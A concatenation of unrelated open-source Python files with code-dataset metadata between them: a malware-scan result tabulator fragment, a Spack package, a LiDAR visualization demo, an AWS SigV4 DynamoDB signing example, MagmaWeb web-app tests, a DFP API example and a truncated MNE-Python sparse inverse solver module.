if self.gui:
for filename in mal_file_dict:
globals.mal_file_dict[filename] = mal_file_dict[filename]
# print(globals.WARNING + 'globals.mal_file_dict' + globals.END)
# print(globals.WARNING + str(globals.mal_file_dict) + globals.END)
mal_file_dict = str(mal_file_dict)
mal_file_dict = mal_file_dict.replace('\'', '\"')
mal_file_dict = json.loads(mal_file_dict)
mal_df = pandas.DataFrame(mal_file_dict)
mal_df = mal_df.transpose()
mal_df.columns = ['Detected', 'Undetected', 'Unsupported', 'Total', 'Report ID']
print(globals.WHITE + mal_df.to_string() + globals.END)
| 42.481618
| 120
| 0.522285
|
4a15aca110d1386c17ecd4e918e3a7cc7b95640e
| 629
|
py
|
Python
|
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2021-11-09T20:28:40.000Z
|
2022-03-15T03:26:33.000Z
|
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-08T20:37:20.000Z
|
2019-03-31T15:19:26.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class PyRarfile(PythonPackage):
"""RAR archive reader for Python."""
homepage = "https://github.com/markokr/rarfile"
pypi = "rarfile/rarfile-4.0.tar.gz"
version('4.0', sha256='67548769229c5bda0827c1663dce3f54644f9dbfba4ae86d4da2b2afd3e602a1')
depends_on('python@3.6:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('unrar', type='run')
| 31.45
| 93
| 0.717011
|
4a15ad0b5cd32442e4060a587fe04dc261a8448a
| 4,518
|
py
|
Python
|
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | 1
|
2021-09-01T00:34:17.000Z
|
2021-09-01T00:34:17.000Z
|
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | null | null | null |
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | null | null | null |
import sys
import cv2
import numpy as np
import mayavi.mlab as mlab
import moviepy.editor as mpy
sys.path.append('/home/mooyu/Project/avod/')
sys.path.append('/home/mooyu/Project/avod/wavedata')
import avod
import avod.builders.config_builder_util as config_builder
from avod.builders.dataset_builder import DatasetBuilder
from viz.viz_utils import draw_gt_boxes3d
from wavedata.tools.core import calib_utils
from wavedata.tools.obj_detection import tracking_utils
from wavedata.tools.obj_detection.obj_utils import compute_box_corners_3d
def build_dataset(dataset_config):
# Overwrite the defaults
dataset_config = config_builder.proto_to_obj(dataset_config)
dataset_config.data_split = 'val'
dataset_config.data_split_dir = 'training'
dataset_config.has_labels = False
# Remove augmentation during evaluation in test mode
dataset_config.aug_list = []
# Build the dataset object
dataset = DatasetBuilder.build_kitti_tracking_dataset(dataset_config,
use_defaults=False)
return dataset
def label_convert(labels, calib):
length = len(labels)
corners_3ds = np.zeros((length, 8, 3), dtype=np.float32)
box_id = []
for i in range(length):
gt_box = labels[i]
boxes3d = compute_box_corners_3d(gt_box).T
boxes3d = calib.project_rect_to_velo(boxes3d)
# x, z ,y ==> x, y, z
corners_3ds[i] = boxes3d[:, [0, 2, 1]]
box_id.append(gt_box.object_id)
return corners_3ds, box_id
def get_all_data(dataset, video_id):
name_list = dataset.get_video_frames(video_id)
point_clouds = []
obj_labels = []
boxes_id = []
images = []
calib = calib_utils.read_tracking_calibration(dataset.calib_dir, video_id)
for name in name_list:
point_cloud = dataset.kitti_utils.get_raw_point_cloud(dataset.bev_source, name)
image = cv2.imread(dataset.get_rgb_image_path(name))[..., ::-1]
obj_label = tracking_utils.read_labels(dataset.label_dir, name)
obj_label = dataset.kitti_utils.filter_labels(obj_label)
obj_label, box_id = label_convert(obj_label, calib)
point_clouds.append(point_cloud)
images.append(image)
obj_labels.append(obj_label)
boxes_id.append(box_id)
# point cloud align
max_len = max([pcl.shape[1] for pcl in point_clouds])
for i in range(len(point_clouds)):
l = point_clouds[i].shape[1]
point_clouds[i] = np.pad(point_clouds[i], ((0, 0), (0, max_len - l)),
mode='constant', constant_values=0)
# labels align
return point_clouds, obj_labels, boxes_id, images
@mlab.animate(delay=100)
def anim(point_clouds, labels, boxes_id, plt):
fig = mlab.gcf()
while True:
for (pcl, label, ids) in zip(point_clouds, labels, boxes_id):
print('Updating scene...')
# draw_gt_boxes3d(label, fig, box_id=ids)
plt.mlab_source.set(x=pcl[0], y=pcl[1], z=pcl[2], f=pcl[3])
fig.scene.render()
yield
config_name = 'pyramid_cars_with_aug_dt_5_tracking_test'
# Read the config from the config folder
experiment_config_path = avod.root_dir() + '/configs/' + \
config_name + '.config'
model_config, _, eval_config, dataset_config = \
config_builder.get_configs_from_pipeline_file(
experiment_config_path, is_training=False)
# change datasets dir to local
dataset_config.dataset_dir = '/media/mooyu/Guoxs_Data/Datasets/' \
'3D_Object_Tracking_Evaluation_2012'
video_id = 4
dataset = build_dataset(dataset_config)
point_clouds, labels, boxes_id, images = get_all_data(dataset, video_id)
fig = mlab.figure(figure=None, bgcolor=(0, 0, 0), fgcolor=None, engine=None, size=(1600, 1000))
# draw lidar
plt = mlab.points3d(point_clouds[0][0],
point_clouds[0][1],
point_clouds[0][2],
point_clouds[0][3],
color=None,
mode='point',
colormap='gnuplot',
scale_factor=1,
figure=fig)
# draw boxes3d
# draw_gt_boxes3d(labels[0], fig, box_id=boxes_id[0])
# draw origin
mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.05)
anim(point_clouds, labels, boxes_id, plt)
mlab.view(azimuth=180, elevation=70, focalpoint=[12.0909996, -1.04700089, -2.03249991],
distance=62.0, figure=fig)
mlab.show()
| 35.023256
| 95
| 0.664675
|
4a15adeee8067a2817ddaaa14508d536651f2b56
| 7,127
|
py
|
Python
|
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# This file is licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# AWS Version 4 signing example
# DynamoDB API (CreateTable)
# See: http://docs.aws.amazon.com/general/latest/gr/sigv4_signing.html
# This version makes a POST request and passes request parameters
# in the body (payload) of the request. Auth information is passed in
# an Authorization header.
import sys, os, base64, datetime, hashlib, hmac
import requests # pip install requests
# ************* REQUEST VALUES *************
method = 'POST'
service = 'dynamodb'
host = 'dynamodb.us-west-2.amazonaws.com'
region = 'us-west-2'
endpoint = 'https://dynamodb.us-west-2.amazonaws.com/'
# POST requests use a content type header. For DynamoDB,
# the content is JSON.
content_type = 'application/x-amz-json-1.0'
# DynamoDB requires an x-amz-target header that has this format:
# DynamoDB_<API version>.<operationName>
amz_target = 'DynamoDB_20120810.CreateTable'
# Request parameters for CreateTable--passed in a JSON block.
request_parameters = '{'
request_parameters += '"KeySchema": [{"KeyType": "HASH","AttributeName": "Id"}],'
request_parameters += '"TableName": "TestTable","AttributeDefinitions": [{"AttributeName": "Id","AttributeType": "S"}],'
request_parameters += '"ProvisionedThroughput": {"WriteCapacityUnits": 5,"ReadCapacityUnits": 5}'
request_parameters += '}'
# Key derivation functions. See:
# http://docs.aws.amazon.com/general/latest/gr/signature-v4-examples.html#signature-v4-examples-python
def sign(key, msg):
return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()
def getSignatureKey(key, date_stamp, regionName, serviceName):
kDate = sign(('AWS4' + key).encode('utf-8'), date_stamp)
kRegion = sign(kDate, regionName)
kService = sign(kRegion, serviceName)
kSigning = sign(kService, 'aws4_request')
return kSigning
# Read AWS access key from env. variables or configuration file. Best practice is NOT
# to embed credentials in code.
access_key = os.environ.get('AWS_ACCESS_KEY_ID')
secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
if access_key is None or secret_key is None:
print('No access key is available.')
sys.exit()
# Create a date for headers and the credential string
t = datetime.datetime.utcnow()
amz_date = t.strftime('%Y%m%dT%H%M%SZ')
date_stamp = t.strftime('%Y%m%d') # Date w/o time, used in credential scope
# ************* TASK 1: CREATE A CANONICAL REQUEST *************
# http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html
# Step 1 is to define the verb (GET, POST, etc.)--already done.
# Step 2: Create canonical URI--the part of the URI from domain to query
# string (use '/' if no path)
canonical_uri = '/'
## Step 3: Create the canonical query string. In this example, request
# parameters are passed in the body of the request and the query string
# is blank.
canonical_querystring = ''
# Step 4: Create the canonical headers. Header names must be trimmed
# and lowercase, and sorted in code point order from low to high.
# Note that there is a trailing \n.
canonical_headers = 'content-type:' + content_type + '\n' + 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n' + 'x-amz-target:' + amz_target + '\n'
# Step 5: Create the list of signed headers. This lists the headers
# in the canonical_headers list, delimited with ";" and in alpha order.
# Note: The request can include any headers; canonical_headers and
# signed_headers include those that you want to be included in the
# hash of the request. "Host" and "x-amz-date" are always required.
# For DynamoDB, content-type and x-amz-target are also required.
signed_headers = 'content-type;host;x-amz-date;x-amz-target'
# Step 6: Create payload hash. In this example, the payload (body of
# the request) contains the request parameters.
payload_hash = hashlib.sha256(request_parameters.encode('utf-8')).hexdigest()
# Step 7: Combine elements to create canonical request
canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers + '\n' + signed_headers + '\n' + payload_hash
# ************* TASK 2: CREATE THE STRING TO SIGN*************
# Match the algorithm to the hashing algorithm you use, either SHA-1 or
# SHA-256 (recommended)
algorithm = 'AWS4-HMAC-SHA256'
credential_scope = date_stamp + '/' + region + '/' + service + '/' + 'aws4_request'
string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256(canonical_request.encode('utf-8')).hexdigest()
# ************* TASK 3: CALCULATE THE SIGNATURE *************
# Create the signing key using the function defined above.
signing_key = getSignatureKey(secret_key, date_stamp, region, service)
# Sign the string_to_sign using the signing_key
signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest()
# ************* TASK 4: ADD SIGNING INFORMATION TO THE REQUEST *************
# Put the signature information in a header named Authorization.
authorization_header = algorithm + ' ' + 'Credential=' + access_key + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature
# For DynamoDB, the request can include any headers, but MUST include "host", "x-amz-date",
# "x-amz-target", "content-type", and "Authorization". Except for the authorization
# header, the headers must be included in the canonical_headers and signed_headers values, as
# noted earlier. Order here is not significant.
# # Python note: The 'host' header is added automatically by the Python 'requests' library.
headers = {'Content-Type':content_type,
'X-Amz-Date':amz_date,
'X-Amz-Target':amz_target,
'Authorization':authorization_header}
# ************* SEND THE REQUEST *************
print('\nBEGIN REQUEST++++++++++++++++++++++++++++++++++++')
print('Request URL = ' + endpoint)
r = requests.post(endpoint, data=request_parameters, headers=headers)
print('\nRESPONSE++++++++++++++++++++++++++++++++++++')
print('Response code: %d\n' % r.status_code)
print(r.text)
#snippet-sourcedescription:[v4-signing-get-post shows how to make a request using the Amazon EC2 query API. The request makes a GET request and passes authentication information to AWS using the Authorization header.]
#snippet-keyword:[Python]
#snippet-keyword:[Code Sample]
#snippet-service:[AWS Signature Version 4 Signing Process]
#snippet-sourcetype:[full-example]
#snippet-sourcedate:[2018-09-20]
#snippet-sourceauthor:[AWS]
| 46.279221
| 219
| 0.695945
|
4a15ae1b75dba57c048ba9f34a5a1aed3945e9be
| 5,954
|
py
|
Python
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 14
|
2015-08-13T17:29:23.000Z
|
2021-09-02T14:00:15.000Z
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 11
|
2015-05-12T13:54:23.000Z
|
2019-06-28T20:39:11.000Z
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 6
|
2016-04-14T11:14:28.000Z
|
2019-11-15T01:12:59.000Z
|
import tempfile
import unittest
import transaction
import json
from nose.plugins.attrib import attr
from webtest import TestApp
from magmaweb import main
from magmaweb.user import DBSession, User
from magmaweb.job import make_job_factory
from magmaweb.tests.test_job import populateTestingDB
@attr('functional')
class FunctionalTests(unittest.TestCase):
settings = {}
def setUp(self):
self.root_dir = tempfile.mkdtemp()
# default settings
settings = {'jobfactory.root_dir': self.root_dir,
'mako.directories': 'magmaweb:templates',
'extjsroot': 'ext',
'sqlalchemy.url': 'sqlite:///:memory:',
'cookie.secret': 'aepeeV6aizaiph5Ae0Reimeequuluwoh',
'cookie.path': '/',
'monitor_user': 'jobmanager',
}
settings.update(self.settings)
self.settings = settings
app = main({}, **self.settings)
self.testapp = TestApp(app)
def tearDown(self):
import shutil
shutil.rmtree(self.root_dir)
del self.testapp
DBSession.remove()
class FunctionalPrivateTests(FunctionalTests):
def setUp(self):
FunctionalTests.setUp(self)
# Setup owner of job
jf = make_job_factory(self.settings)
with transaction.manager:
user = User('bob', 'Bob Example',
'bob@example.com', 'mypassword')
DBSession().add(user)
self.job = jf.fromScratch('bob')
self.jobid = self.job.id
def do_login(self):
params = {'userid': 'bob', 'password': 'mypassword'}
self.testapp.post('/login', params)
def fake_jobid(self):
""" Create job in self.root_dir filled with test db"""
with transaction.manager:
populateTestingDB(self.job.db.session)
return self.jobid
def test_home(self):
self.do_login()
res = self.testapp.get('/', status=200)
self.assertTrue(b'Submit' in res.body)
def test_molecules(self):
self.do_login()
jobid = self.fake_jobid()
res_url = '/results/' + str(jobid)
res_url += '/molecules.json?limit=10&start=0'
res = self.testapp.get(res_url, status=200)
url1 = '<a href="http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi'
url1 += '?cid=289">CID: 289</a>'
url2 = '<a href="http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi'
url2 += '?cid=152432">CID: 152432</a>'
self.assertEqual(json.loads(res.body), {
'totalUnfiltered': 2,
'total': 2,
'scans': [{
'rt': 933.317,
'id': 641
}, {
'rt': 1254.15,
'id': 870
}],
'rows': [{
'molid': 72,
'predicted': False,
'mol': 'Molfile',
'formula': 'C6H6O2',
'nhits': 1,
'name': 'pyrocatechol',
'refscore': 1.0,
'reactionsequence': {
'reactantof': {
'esterase': {
'nr': 2,
'nrp': 1
}
}
},
'smiles': 'C1=CC=C(C(=C1)O)O',
'inchikey14': 'YCIMNLLNPGFGHC',
'mim': 110.03677, 'logp': 1.231,
'assigned': False,
'reference': url1
}, {
'predicted': False, 'molid': 352,
'mol': "Molfile of dihydroxyphenyl-valerolactone",
'formula': "C11H12O4",
'nhits': 1,
'name': "dihydroxyphenyl-valerolactone",
'refscore': 1.0,
'reactionsequence': {
'productof': {
'theogallin': {
'nr': 1,
'nrp': 0
}
}
},
'smiles': "O=C1CCC(Cc2ccc(O)c(O)c2)O1",
'inchikey14': 'ZNXXWTPQHVLMQT',
'mim': 208.07355, 'logp': 2.763,
'assigned': False,
'reference': url2
}]
})
def test_double_update_job(self):
"""Double update should not raise
OperationalError: database is locked"""
self.do_login()
jobid = self.fake_jobid()
req_url = '/results/' + str(jobid)
req_body = json.dumps({"id": "bar",
"description": "New description",
"ms_filename": "F6789.mzxml",
"created_at": "1999-12-17T13:45:04",
"is_public": False,
})
self.testapp.put(req_url, req_body)
req_body2 = json.dumps({"id": "bar",
"description": "New description 2",
"ms_filename": "F6789.mzxml 2",
"created_at": "1999-12-17T13:45:04",
"is_public": False,
})
self.testapp.put(req_url, req_body2)
class FunctionalPublicTests(FunctionalTests):
settings = {'auto_register': True}
def test_home(self):
# Visiting / redirects to /login
# which automatically registers/logins and redirects back to /
res = self.testapp.get('/', status=302).follow(status=200)
self.assertTrue(b'Submit' in res.body)
| 36.304878
| 77
| 0.4565
|
4a15ae1bad6d4fb79db47d7f61d42cf28c6ad872
| 1,625
|
py
|
Python
|
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2020-04-02T19:00:31.000Z
|
2020-08-06T03:28:38.000Z
|
#!/usr/bin/python
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all placements. To create placements, run
create_placement.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
placement_service = client.GetService('PlacementService', version='v201208')
# Get placements by statement.
placements = DfpUtils.GetAllEntitiesByStatementWithService(placement_service)
# Display results.
for placement in placements:
print ('Placement with id \'%s\' and name \'%s\' was found.'
% (placement['id'], placement['name']))
print
print 'Number of results found: %s' % len(placements)
| 33.163265
| 80
| 0.736
|
4a15aef9a09d6133c229ad389452ee8e6f3fe7bc
| 27,518
|
py
|
Python
|
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Daniel Strohmeier <daniel.strohmeier@gmail.com>
#
# License: Simplified BSD
import numpy as np
from scipy import linalg, signal
from ..source_estimate import (SourceEstimate, VolSourceEstimate,
_BaseSourceEstimate)
from ..minimum_norm.inverse import (combine_xyz, _prepare_forward,
_check_reference, _check_loose_forward)
from ..forward import (compute_orient_prior, is_fixed_orient,
convert_forward_solution)
from ..io.pick import pick_channels_evoked
from ..io.proj import deactivate_proj
from ..utils import logger, verbose
from ..dipole import Dipole
from ..externals.six.moves import xrange as range
from .mxne_optim import (mixed_norm_solver, iterative_mixed_norm_solver, _Phi,
norm_l2inf, tf_mixed_norm_solver, norm_epsilon_inf)
@verbose
def _prepare_weights(forward, gain, source_weighting, weights, weights_min):
mask = None
if isinstance(weights, _BaseSourceEstimate):
weights = np.max(np.abs(weights.data), axis=1)
weights_max = np.max(weights)
if weights_min > weights_max:
raise ValueError('weights_min > weights_max (%s > %s)' %
(weights_min, weights_max))
weights_min = weights_min / weights_max
weights = weights / weights_max
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
weights = np.ravel(np.tile(weights, [n_dip_per_pos, 1]).T)
if len(weights) != gain.shape[1]:
raise ValueError('weights do not have the correct dimension '
' (%d != %d)' % (len(weights), gain.shape[1]))
if len(source_weighting.shape) == 1:
source_weighting *= weights
else:
source_weighting *= weights[:, None]
gain *= weights[None, :]
if weights_min is not None:
mask = (weights > weights_min)
gain = gain[:, mask]
n_sources = np.sum(mask) // n_dip_per_pos
logger.info("Reducing source space to %d sources" % n_sources)
return gain, source_weighting, mask
@verbose
def _prepare_gain_column(forward, info, noise_cov, pca, depth, loose, weights,
weights_min, verbose=None):
gain_info, gain, _, whitener, _ = _prepare_forward(forward, info,
noise_cov, pca)
logger.info('Whitening lead field matrix.')
gain = np.dot(whitener, gain)
is_fixed_ori = is_fixed_orient(forward)
if depth is not None:
depth_prior = np.sum(gain ** 2, axis=0)
if not is_fixed_ori:
depth_prior = depth_prior.reshape(-1, 3).sum(axis=1)
# Spherical leadfield can be zero at the center
depth_prior[depth_prior == 0.] = np.min(
depth_prior[depth_prior != 0.])
depth_prior **= depth
if not is_fixed_ori:
depth_prior = np.repeat(depth_prior, 3)
source_weighting = np.sqrt(1. / depth_prior)
else:
source_weighting = np.ones(gain.shape[1], dtype=gain.dtype)
assert (is_fixed_ori or (0 <= loose <= 1))
if loose is not None and loose < 1.:
source_weighting *= np.sqrt(compute_orient_prior(forward, loose))
gain *= source_weighting[None, :]
if weights is None:
mask = None
else:
gain, source_weighting, mask = _prepare_weights(forward, gain,
source_weighting,
weights, weights_min)
return gain, gain_info, whitener, source_weighting, mask
def _prepare_gain(forward, info, noise_cov, pca, depth, loose, weights,
weights_min, verbose=None):
if not isinstance(depth, float):
raise ValueError('Invalid depth parameter. '
'A float is required (got %s).'
% type(depth))
elif depth < 0.0:
raise ValueError('Depth parameter must be positive (got %s).'
% depth)
gain, gain_info, whitener, source_weighting, mask = \
_prepare_gain_column(forward, info, noise_cov, pca, depth,
loose, weights, weights_min)
return gain, gain_info, whitener, source_weighting, mask
def _reapply_source_weighting(X, source_weighting, active_set):
X *= source_weighting[active_set][:, None]
return X
def _compute_residual(forward, evoked, X, active_set, info):
# OK, picking based on row_names is safe
sel = [forward['sol']['row_names'].index(c) for c in info['ch_names']]
residual = evoked.copy()
residual = pick_channels_evoked(residual, include=info['ch_names'])
r_tmp = residual.copy()
r_tmp.data = np.dot(forward['sol']['data'][sel, :][:, active_set], X)
# Take care of proj
active_projs = list()
non_active_projs = list()
for p in evoked.info['projs']:
if p['active']:
active_projs.append(p)
else:
non_active_projs.append(p)
if len(active_projs) > 0:
r_tmp.info['projs'] = deactivate_proj(active_projs, copy=True)
r_tmp.apply_proj()
r_tmp.add_proj(non_active_projs, remove_existing=False)
residual.data -= r_tmp.data
return residual
@verbose
def _make_sparse_stc(X, active_set, forward, tmin, tstep,
active_is_idx=False, verbose=None):
if not is_fixed_orient(forward):
logger.info('combining the current components...')
X = combine_xyz(X)
if not active_is_idx:
active_idx = np.where(active_set)[0]
else:
active_idx = active_set
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
if n_dip_per_pos > 1:
active_idx = np.unique(active_idx // n_dip_per_pos)
src = forward['src']
if src.kind != 'surface':
vertices = src[0]['vertno'][active_idx]
stc = VolSourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep)
else:
vertices = []
n_points_so_far = 0
for this_src in src:
this_n_points_so_far = n_points_so_far + len(this_src['vertno'])
this_active_idx = active_idx[(n_points_so_far <= active_idx) &
(active_idx < this_n_points_so_far)]
this_active_idx -= n_points_so_far
this_vertno = this_src['vertno'][this_active_idx]
n_points_so_far = this_n_points_so_far
vertices.append(this_vertno)
stc = SourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep)
return stc
@verbose
def _make_dipoles_sparse(X, active_set, forward, tmin, tstep, M, M_est,
active_is_idx=False, verbose=None):
times = tmin + tstep * np.arange(X.shape[1])
if not active_is_idx:
active_idx = np.where(active_set)[0]
else:
active_idx = active_set
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
if n_dip_per_pos > 1:
active_idx = np.unique(active_idx // n_dip_per_pos)
gof = np.zeros(M_est.shape[1])
M_norm2 = np.sum(M ** 2, axis=0)
R_norm2 = np.sum((M - M_est) ** 2, axis=0)
gof[M_norm2 > 0.0] = 1. - R_norm2[M_norm2 > 0.0] / M_norm2[M_norm2 > 0.0]
gof *= 100.
dipoles = []
for k, i_dip in enumerate(active_idx):
i_pos = forward['source_rr'][i_dip][np.newaxis, :]
i_pos = i_pos.repeat(len(times), axis=0)
X_ = X[k * n_dip_per_pos: (k + 1) * n_dip_per_pos]
if n_dip_per_pos == 1:
amplitude = X_[0]
i_ori = forward['source_nn'][i_dip][np.newaxis, :]
i_ori = i_ori.repeat(len(times), axis=0)
else:
if forward['surf_ori']:
X_ = np.dot(forward['source_nn'][i_dip *
n_dip_per_pos:(i_dip + 1) * n_dip_per_pos].T, X_)
amplitude = np.sqrt(np.sum(X_ ** 2, axis=0))
i_ori = np.zeros((len(times), 3))
i_ori[amplitude > 0.] = (X_[:, amplitude > 0.] /
amplitude[amplitude > 0.]).T
dipoles.append(Dipole(times, i_pos, amplitude, i_ori, gof))
return dipoles
@verbose
def make_stc_from_dipoles(dipoles, src, verbose=None):
"""Convert a list of spatio-temporal dipoles into a SourceEstimate.
Parameters
----------
dipoles : Dipole | list of instances of Dipole
The dipoles to convert.
src : instance of SourceSpaces
The source space used to generate the forward operator.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
stc : SourceEstimate
The source estimate.
"""
logger.info('Converting dipoles into a SourceEstimate.')
if isinstance(dipoles, Dipole):
dipoles = [dipoles]
if not isinstance(dipoles, list):
raise ValueError('Dipoles must be an instance of Dipole or '
'a list of instances of Dipole. '
'Got %s!' % type(dipoles))
tmin = dipoles[0].times[0]
tstep = dipoles[0].times[1] - tmin
X = np.zeros((len(dipoles), len(dipoles[0].times)))
source_rr = np.concatenate([_src['rr'][_src['vertno'], :] for _src in src],
axis=0)
n_lh_points = len(src[0]['vertno'])
lh_vertno = list()
rh_vertno = list()
for i in range(len(dipoles)):
if not np.all(dipoles[i].pos == dipoles[i].pos[0]):
raise ValueError('Only dipoles with fixed position over time '
'are supported!')
X[i] = dipoles[i].amplitude
idx = np.all(source_rr == dipoles[i].pos[0], axis=1)
idx = np.where(idx)[0][0]
if idx < n_lh_points:
lh_vertno.append(src[0]['vertno'][idx])
else:
rh_vertno.append(src[1]['vertno'][idx - n_lh_points])
vertices = [np.array(lh_vertno).astype(int),
np.array(rh_vertno).astype(int)]
stc = SourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep,
subject=src[0]['subject_his_id'])
logger.info('[done]')
return stc
@verbose
def mixed_norm(evoked, forward, noise_cov, alpha, loose='auto', depth=0.8,
maxit=3000, tol=1e-4, active_set_size=10, pca=True,
debias=True, time_pca=True, weights=None, weights_min=None,
solver='auto', n_mxne_iter=1, return_residual=False,
return_as_dipoles=False, dgap_freq=10, verbose=None):
"""Mixed-norm estimate (MxNE) and iterative reweighted MxNE (irMxNE).
Compute L1/L2 mixed-norm solution [1]_ or L0.5/L2 [2]_ mixed-norm
solution on evoked data.
Parameters
----------
evoked : instance of Evoked or list of instances of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
alpha : float in range [0, 100)
Regularization parameter. 0 means no regularization, 100 would give 0
active dipole.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth: None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter.
active_set_size : int | None
Size of active set increment. If None, no active set strategy is used.
pca : bool
If True the rank of the data is reduced to true dimension.
debias : bool
Remove coefficient amplitude bias due to L1 penalty.
time_pca : bool or int
If True the rank of the concatenated epochs is reduced to
its true dimension. If is 'int' the rank is limited to this value.
weights : None | array | SourceEstimate
Weight for penalty in mixed_norm. Can be None, a
1d array with shape (n_sources,), or a SourceEstimate (e.g. obtained
with wMNE, dSPM, or fMRI).
weights_min : float
Do not consider in the estimation sources for which weights
is less than weights_min.
solver : 'prox' | 'cd' | 'bcd' | 'auto'
The algorithm to use for the optimization. 'prox' stands for
proximal iterations using the FISTA algorithm, 'cd' uses
